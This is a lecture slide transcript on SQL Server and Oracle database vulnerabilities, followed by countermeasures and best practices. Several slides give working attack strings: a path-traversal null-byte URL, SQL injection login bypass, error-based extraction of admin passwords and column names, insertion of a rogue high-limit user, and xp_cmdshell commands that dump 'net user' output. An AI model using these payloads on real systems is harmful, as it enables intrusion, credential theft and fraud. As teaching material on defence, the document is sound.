1 / 29

sql server vulnerabilities

benjamin
Download Presentation

sql server vulnerabilities

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

    1. 1 SQL Server Vulnerabilities

    2. 2

    3. 3 Vulnerability Identification Vulnerabilities are usually identified during audit phase Most vulnerabilities emanate from dynamic systems Example: dynamically creating a file image in a temporary directory is a useful feature allows downloading of file image Vulnerability is that this feature could be exploited to download source code of an ASP script

    4. 4 Vulnerability Identification Example: www.example.com/getimage.asp?f=12345678&e=gif is an allowed operation www.example.com/getimage.asp?f=..\maketrade.asp%00&e=gif is an exploit Vulnerability is that the “f” parameter can allow access to files in its parent directory path %00 passes a null character that suppresses the restriction to “gif” files only

    5. 5 Vulnerability Identification Character insertion vulnerabilities: Single quote, double quote, #, || SQL reserved words insertion: tab %09 carriage return %0d linefeed %0a space %00 make the system wait while executing a query: ‘1+waitfor+delay+’0:0:10’--

    6. 6 Exploiting Vulnerabilities Creation of new user Select * from users where username = ‘fred’ and password = ‘sesame’ Select * from users where username = ‘fr’ed’ and password = ‘sesame’ Use the value for username as ‘ or 1=1-- will login as the first user in the users table Select * from users where username = ‘ or 1 in (select password from users where username=‘admin’)-- will give an error message that contains the password for admin

    7. 7 Exploiting Vulnerabilities Select * from users where username = ‘ or 1 in (select ‘a’+str(id) from sysobjects where name=‘users’)-- will give an error message that contains the information to find the column names (e.g., syntax error converting the varchar value ‘a 2815072’ to a column of data type int) Select * from users where username = ‘ or 1 in (select name from syscolumns where id=2815072 and colorder > 0)-- will give the column name Successively replacing the colorder > 0 to 1, 2, 3, etc one can find the names of all columns

    8. 8 Exploiting Vulnerabilities Assume that the column names are id, username, password, transaction_limit, settings_file Select * from users where username = ‘ or 1 in (select ‘a’+str(max(id)) from users)-- will give the maximum id value corresponding to the last user in the table Select * from users where username = ‘ or 1 in (select ‘a’+str(max(transaction_limit)) from users)-- will give the maximum value of transaction limit for any user

    9. 9 Exploiting Vulnerabilities Next we can find the settings_file value using Select * from users where username = ‘ or 1 in (select settings_file from users)-- Select * from users where username = ‘ ; insert into users values (5, ‘test’, ‘test’, 10000000, d:\userprofiles\admin.prof ’)-- will create a user called test with password test and a transaction limit of $10 million

    10. 10 Exploiting Vulnerabilities In the absence of error messages, see if sysadmin is logged in: When the following code is placed in the middle of an SQL command, if(is_srvrolemember(‘sysadmin’)>0) waitfor delay ‘0:0:5’ a pause in execution is an indication that the sysadmin is logged in Exploiting from command line Select * from users where username = ‘asmith’; exec xp_cmdshell ‘dir > c:\foo.txt’--

    11. 11 Exploiting Vulnerabilities Exploiting from command line Select * from users where username = ‘asmith’; exec xp_cmdshell ‘nslookup thisisatest 192.168.1.1’-- will look for the host thisisatest on the DNS server 192.168.1.1

    12. 12 Exploiting Vulnerabilities Creating a temporary table and storing in it user account information Example: Select * from users where username = ‘; create table foo(a int identity(1,1), b varchar(4000)); insert into foo exec xp_cmdshell ‘cmd /c net user’-- will create the table foo Select * from users where username = ‘ or 1 in (select b from foo where a=1)-- will give the user account information for the first user

    13. 13 Exploiting Vulnerabilities Vulnerable extended stored procedures in the sp_OA family are: sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop

    14. 14 Exploiting Vulnerabilities SQL Server outputs plenty of usable error messages Both Oracle and MySQL do not output much usable error messages SQL Server does an implicit conversion of integers to strings where necessary, making it easy for hackers to guess data types Use of single line comment character sequence of -- Query batching feature (i.e., multiple queries can be run in sequence by separating them with semicolon)

    15. 15 Exploiting Vulnerabilities SQL Server allows web server scripts with query string parameters (e.g., http://www.example.com/query.asp?username=fred) Form parameters Cookie values HTTP request headers such as Host, User-Agent, Pragma, Accept Registry keys/values Filenames

    16. 16 Countermeasures User input should not be placed unmodified directly into the SQL query Extended stored procedures should not be available for anyone with public role Application should not connect to the database as ‘sa’ SQL server should not be installed to run under SYSTEM or localsystem account

    17. 17 Countermeasures Allow only known good input Strip or reject bad input Avoid running query of a user’s choice Do not rush to production any software under development Address security issues at design time Turn-off unnecessary error messages

    18. 18 Best Practices Input validation Specify data type at design time for all variables receiving data from user input Set up input filter to allow only good data (i.e., data of the form ‘--’ will be filtered out) Aim for designing ‘strength in depth’ Use the ‘principle of least privilege’ (i.e., grant only the necessary privileges for performing the function)

    19. 19 Best Practices Run SQL Server with least privileges Restrict execution of extended stored procedures Apply change control and version control in development Perform periodic security code review Have policies in place to identify how emergency application changes will be handled

    20. 20 Best Practices Check the permissions associated with pre-configured roles: db_accessadmin db_owner db_securityadmin public Check statement-level and object-level permissions: Statement-level permissions: create table, view, sp Object-level permissions: select, update, insert

    21. 21 Best Practices Physically secure the database server Use NTFS partition of disk Also use EFS with NTFS for suitable encryption Rename the local admin account Enable security auditing for logins Install virus protection software Disable all unnecessary services on the server such as print server

    22. 22 Best Practices Create domain groups and assign users to domain groups. Grant in necessary privileges to domain groups. Use firewalls Disable TCP port 1433 and UDP port 1434 on the firewall Place database server on a secure subnet of the network

    23. 23 Best Practices Monitor Microsoft for patches Always use stored procedures in applications Do not allow dynamic SQL creation in stored procedures Have all objects to have the same owner (e.g., dbo)

    24. 24 Oracle Vulnerabilities If Oracle listener is configured to accept network connections, it would allow execution of any function on the host OS Users with CREATE LIBRARY permission could make arbitrary calls to the OS Files created to run a Java applet could reveal the username and password used for database authentication (problem with default Apache configuration)

    25. 25 Oracle Vulnerabilities

    26. 26 Oracle Vulnerabilities In Figure 1, client request comes through a firewall to the web server which connects to the database through the TNS listener Vulnerabilities in Apache server allow DoS attacks and buffer overflow attacks NGS Software has identified several vulnerabilities through its series NGSSoftware Insight Security Research Advisory (NISR)

    27. 27 Oracle Vulnerabilities 1. Oracle extproc local command execution (#NISR23122004C) (NOT PATCHED)  2. Oracle ISQLPlus file access vulnerability (#NISR2122004E)  3. Oracle TNS Listener DoS (#NISR2122004F)  4. Oracle multiple PL/SQL injection vulnerabilities (#NISR2122004H)  5. Oracle wrapped procedure overflow (#NISR2122004J)  6. Oracle extproc directory traversal (#NISR23122004B)  7. Oracle extproc buffer overflow (#NISR23122004A)  8. Oracle clear text passwords (#NISR2122004D)  9. Oracle Character Conversion Bugs (#NISR2122004G)

    28. 28 References Tool Command Language (TCL) substitution character list http://tmml.sourceforge.net/doc/tcl/Tcl.html Proof-of-Concept (POC) attack http://www.appsecinc.com/resources/freetools/ SQL Injection http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

    29. 29 References Oracle vulnerabilities http://www.counterpane.com/alert-oracle.html David Litchfield’s paper on Oracle vulnerabilities http://www.nextgenss.com/papers/hpoas.pdf NGS Software Oracle vulnerabilities list (Dec. ’04) http://dbaoracle.com/oracle_news/2004_12_31_serious_vulberabilities.htm

More Related